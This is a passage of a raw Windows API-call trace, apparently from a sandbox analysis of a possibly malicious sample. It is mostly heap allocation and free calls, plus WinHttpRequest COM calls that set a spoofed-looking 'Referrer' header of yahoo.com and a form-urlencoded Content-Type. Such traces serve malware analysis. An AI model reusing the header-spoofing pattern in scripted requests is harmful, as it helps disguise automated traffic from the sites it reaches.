hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891988 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f28 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a150 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96aa38 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa74868 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a68 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0f0 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919b8 | out: hHeap=0x850000) returned 1 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a078 | out: hHeap=0x850000) returned 1 [0279.271] PeekMessageW (in: lpMsg=0x75f8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f8fc) returned 0 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x8919b8 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a078 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a68 [0279.271] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a078 | out: hHeap=0x850000) returned 1 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0xac94a8 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0xa74868 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a078 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0f0 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96aa38 [0279.271] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a150 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f28 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a0c0 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891988 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a048 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891988 | out: hHeap=0x850000) returned 1 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0xa74890 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a090 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a180 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891988 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a048 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891988 | out: hHeap=0x850000) returned 1 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a198 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a930 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0f0 | out: hHeap=0x850000) returned 1 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a078 | out: hHeap=0x850000) returned 1 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96aa38 | out: hHeap=0x850000) returned 1 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f28 | out: hHeap=0x850000) returned 1 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a150 | out: hHeap=0x850000) returned 1 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0279.272] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa74868 | out: hHeap=0x850000) returned 1 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0c0 [0279.272] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891988 [0279.273] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x18) returned 0x972248 [0279.273] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x22) returned 0xa7ae40 [0279.273] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x896c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75f208*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x75f30c | out: rgDispId=0x75f30c*=2) returned 0x0 [0279.273] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa7ae40 | out: hHeap=0x850000) returned 1 [0279.273] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x896c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x75f200 | out: ppTInfo=0x75f200*=0xa8727c) returned 0x0 [0279.273] ITypeInfo:RemoteGetTypeAttr (in: This=0xa8727c, ppTypeAttr=0x75f1f8, pDummy=0x356310 | out: ppTypeAttr=0x75f1f8, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalGetIDsOfNames (This=0xa8727c) returned 0x0 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x0, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x1, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x2, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x3, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x4, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x5, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x6, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x7, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x8, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x9, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.273] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0xa, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.273] ITypeInfo:LocalReleaseTypeAttr (This=0xa8727c) returned 0xa377a8 [0279.274] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.274] WinHttpRequest:IUnknown:Release (This=0xa8727c) returned 0x1 [0279.274] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x34) returned 0xaa5118 [0279.274] WinHttpRequest:IDispatch:Invoke (in: This=0x896c30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f2f0*(rgvarg=([0]=0xaa511c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xaa512c*(varType=0x8, wReserved1=0x0, wReserved2=0x5abf, wReserved3=0x1b04, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8, puArgErr=0x75f300 | out: pDispParams=0x75f2f0*(rgvarg=([0]=0xaa511c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xaa512c*(varType=0x8, wReserved1=0x0, wReserved2=0x5abf, wReserved3=0x1b04, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f300*=0x2b5995) returned 0x0 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x972248 | out: hHeap=0x850000) returned 1 [0279.274] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f28 [0279.274] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96aa38 [0279.274] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a08 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xaa5118 | out: hHeap=0x850000) returned 1 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891988 | out: hHeap=0x850000) returned 1 [0279.274] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0c0 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f28 | out: hHeap=0x850000) returned 1 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xac94a8 | out: hHeap=0x850000) returned 1 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a68 | out: hHeap=0x850000) returned 1 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a180 | out: hHeap=0x850000) returned 1 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a090 | out: hHeap=0x850000) returned 1 [0279.274] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a930 | out: hHeap=0x850000) returned 1 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a198 | out: hHeap=0x850000) returned 1 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa74890 | out: hHeap=0x850000) returned 1 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919b8 | out: hHeap=0x850000) returned 1 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96aa38 | out: hHeap=0x850000) returned 1 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a08 | out: hHeap=0x850000) returned 1 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0279.275] PeekMessageW (in: lpMsg=0x75f8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f8fc) returned 0 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a08 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0c0 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919b8 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x30) returned 0xac94a8 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0xa74890 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a0c0 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96aa38 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a198 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a930 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a090 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a180 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a68 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f28 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a68 | out: hHeap=0x850000) returned 1 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0xa74868 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a078 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a0f0 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891a68 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f28 | out: hHeap=0x850000) returned 1 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x969f28 [0279.275] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a68 | out: hHeap=0x850000) returned 1 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a048 [0279.275] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96b620 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969f28 | out: hHeap=0x850000) returned 1 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96aa38 | out: hHeap=0x850000) returned 1 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0c0 | out: hHeap=0x850000) returned 1 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a198 | out: hHeap=0x850000) returned 1 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a090 | out: hHeap=0x850000) returned 1 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a930 | out: hHeap=0x850000) returned 1 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a180 | out: hHeap=0x850000) returned 1 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa74890 | out: hHeap=0x850000) returned 1 [0279.276] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a180 [0279.276] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a68 [0279.276] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x18) returned 0x972248 [0279.276] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x22) returned 0xa7ae40 [0279.276] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x896c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75f208*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x75f30c | out: rgDispId=0x75f30c*=2) returned 0x0 [0279.276] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa7ae40 | out: hHeap=0x850000) returned 1 [0279.276] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x896c30, iTInfo=0x0, lcid=0x800, ppTInfo=0x75f200 | out: ppTInfo=0x75f200*=0xa8727c) returned 0x0 [0279.276] ITypeInfo:RemoteGetTypeAttr (in: This=0xa8727c, ppTypeAttr=0x75f1f8, pDummy=0x356310 | out: ppTypeAttr=0x75f1f8, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.276] ITypeInfo:LocalGetIDsOfNames (This=0xa8727c) returned 0x0 [0279.276] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x0, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.276] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.276] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x1, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.276] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.276] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x2, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.276] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0x88b318 [0279.276] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x3, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.276] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.276] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x4, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.276] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.276] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x5, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.276] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.277] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x6, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.277] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.277] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x7, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.277] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.277] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x8, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.277] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.277] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0x9, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.277] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.277] ITypeInfo:RemoteGetFuncDesc (in: This=0xa8727c, index=0xa, ppFuncDesc=0x75f1fc, pDummy=0x356310 | out: ppFuncDesc=0x75f1fc, pDummy=0x356310*=0x3225e4) returned 0x0 [0279.277] ITypeInfo:LocalReleaseTypeAttr (This=0xa8727c) returned 0xa377a8 [0279.277] ITypeInfo:LocalReleaseFuncDesc (This=0xa8727c) returned 0xa88a48 [0279.277] WinHttpRequest:IUnknown:Release (This=0xa8727c) returned 0x1 [0279.277] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x34) returned 0xaa5118 [0279.277] WinHttpRequest:IDispatch:Invoke (in: This=0x896c30, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f2f0*(rgvarg=([0]=0xaa511c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xaa512c*(varType=0x8, wReserved1=0x0, wReserved2=0x5abf, wReserved3=0x1b04, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8, puArgErr=0x75f300 | out: pDispParams=0x75f2f0*(rgvarg=([0]=0xaa511c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xaa512c*(varType=0x8, wReserved1=0x0, wReserved2=0x5abf, wReserved3=0x1b04, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f2b8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f300*=0x2b5995) returned 0x0 [0279.277] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x972248 | out: hHeap=0x850000) returned 1 [0279.277] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a090 [0279.277] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a198 [0279.277] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891988 [0279.277] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xaa5118 | out: hHeap=0x850000) returned 1 [0279.277] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a180 | out: hHeap=0x850000) returned 1 [0279.277] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a68 | out: hHeap=0x850000) returned 1 [0279.277] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a180 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a090 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xac94a8 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8919b8 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a0f0 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a078 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96b620 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa74868 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891a08 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a198 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x891988 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a180 | out: hHeap=0x850000) returned 1 [0279.278] PeekMessageW (in: lpMsg=0x75f8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f8fc) returned 0 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x8) returned 0x891988 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a180 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x891a08 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0xa74868 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96a198 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a048 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x96b620 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0xa74890 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96a078 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a048 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96a198 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x96b620 | out: hHeap=0x850000) returned 1 [0279.278] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0xa74868 | out: hHeap=0x850000) returned 1 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x96b620 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8919b8 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x18) returned 0x972248 [0279.278] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xa) returned 0x96a198 [0279.278] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x896c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, 